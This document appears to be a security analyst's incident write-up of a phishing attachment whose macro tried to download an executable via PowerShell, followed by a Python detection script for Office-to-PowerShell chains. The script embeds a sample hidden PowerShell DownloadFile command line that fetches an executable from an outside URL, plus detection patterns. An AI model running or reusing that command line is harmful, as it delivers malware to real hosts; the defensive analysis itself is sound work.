T1566 Phishing T1204 User Execution T1059.001 PowerShell T1105 Ingress Tool Transfer
User Jayne on host 172.16.17.198 opened malicious attachment edit1-invoice.docm sent from jake.admin@cybercommunity.info
Macro executed via InkEdit1_GotFocus, which launched cmd.exe and PowerShell to download messbox.exe from http://www.greyhathacker.net/tools/messbox.exe and save it as mess.exe
Feb 28 2024 08:42 AM
File located in Downloads folder. Outbound HTTP GET request to http://www.greyhathacker.net/tools/messbox.exe from powershell.exe
Phishing email delivering a macro-enabled document that downloads and executes remote malware
olevba confirmed auto-execution and PowerShell DownloadFile behavior. Network logs show an HTTP 404 response, so the payload was not retrieved. No evidence of successful execution. True positive: macro execution without second-stage compromise
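The two findings above (an Office process spawning cmd.exe/PowerShell with a DownloadFile primitive, and a proxy record showing the fetch failed) are the kind of logic a detection rule would encode. The following is an added example written for this note, not tooling from the incident: it runs over constructed sample process-creation and proxy events, flags the Office-to-script-host chain, extracts the URL from the command line, and uses the proxy status code to decide whether the second stage was actually retrieved. The parent name WINWORD.EXE, the field names, and the sample events are assumptions; the host, user, URL, and file names are taken from the note.

```python
"""Detection logic for an Office -> cmd/PowerShell -> download chain.

Sample events below are constructed stand-ins for EDR process-creation
and web-proxy logs; the field names are assumptions, not a product schema.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # assumed parent names
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.I
)
URL_RE = re.compile(r"https?://[^\s'\"]+")

# Constructed command line modelled on the macro behaviour described in the note.
MACRO_CMD = (
    "cmd.exe /c powershell -w hidden -c "
    "\"(New-Object Net.WebClient).DownloadFile("
    "'http://www.greyhathacker.net/tools/messbox.exe',"
    "'C:\\Users\\Jayne\\Downloads\\mess.exe')\""
)

# Constructed sample process-creation events (not real telemetry).
PROCESS_EVENTS = [
    {"host": "172.16.17.198", "user": "Jayne", "parent": "WINWORD.EXE",
     "image": "cmd.exe", "cmdline": MACRO_CMD},
    {"host": "172.16.17.198", "user": "Jayne", "parent": "cmd.exe",
     "image": "powershell.exe", "cmdline": MACRO_CMD[len("cmd.exe /c "):]},
    {"host": "172.16.17.200", "user": "bob", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]

# Constructed sample proxy events; the 404 mirrors what the network logs showed.
PROXY_EVENTS = [
    {"host": "172.16.17.198", "process": "powershell.exe", "method": "GET",
     "url": "http://www.greyhathacker.net/tools/messbox.exe", "status": 404, "bytes": 0},
]


def find_office_spawn_alerts(events):
    """Return one alert per script-host child of an Office process.

    Severity is 'high' when the command line also carries a download primitive,
    'medium' otherwise (an Office app spawning cmd/PowerShell is unusual by itself).
    """
    alerts = []
    for ev in events:
        if ev["parent"].lower() in OFFICE_PARENTS and ev["image"].lower() in SCRIPT_HOSTS:
            has_download = bool(DOWNLOAD_RE.search(ev["cmdline"]))
            alerts.append({
                "host": ev["host"],
                "user": ev["user"],
                "chain": f"{ev['parent']} -> {ev['image']}",
                "severity": "high" if has_download else "medium",
                "urls": URL_RE.findall(ev["cmdline"]),
            })
    return alerts


def classify_outcome(alert, proxy_events):
    """Decide whether the second stage reached the host.

    Returns (verdict, http_status). 'retrieved' requires a 2xx with a non-empty
    body; 'attempted_not_retrieved' means the request was seen but failed
    (e.g. 404); 'no_network_evidence' means no proxy record matched the URLs.
    """
    matches = [
        px for px in proxy_events
        if px["host"] == alert["host"] and px["url"] in alert["urls"]
    ]
    for px in matches:
        if 200 <= px["status"] < 300 and px["bytes"] > 0:
            return ("retrieved", px["status"])
    if matches:
        return ("attempted_not_retrieved", matches[-1]["status"])
    return ("no_network_evidence", None)


if __name__ == "__main__":
    for alert in find_office_spawn_alerts(PROCESS_EVENTS):
        verdict, status = classify_outcome(alert, PROXY_EVENTS)
        print(f"{alert['host']} {alert['user']} {alert['chain']} "
              f"severity={alert['severity']} urls={alert['urls']} "
              f"outcome={verdict} http={status}")
```

The chain rule fires on the parent/child pair alone, so a macro that avoids the DownloadFile keyword still produces a medium alert; the outcome classification is what lets an analyst separate "attempted" from "compromised", which is exactly the distinction the 404 made here.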
Action: Host contained, email removed, file deleted, and monitoring continued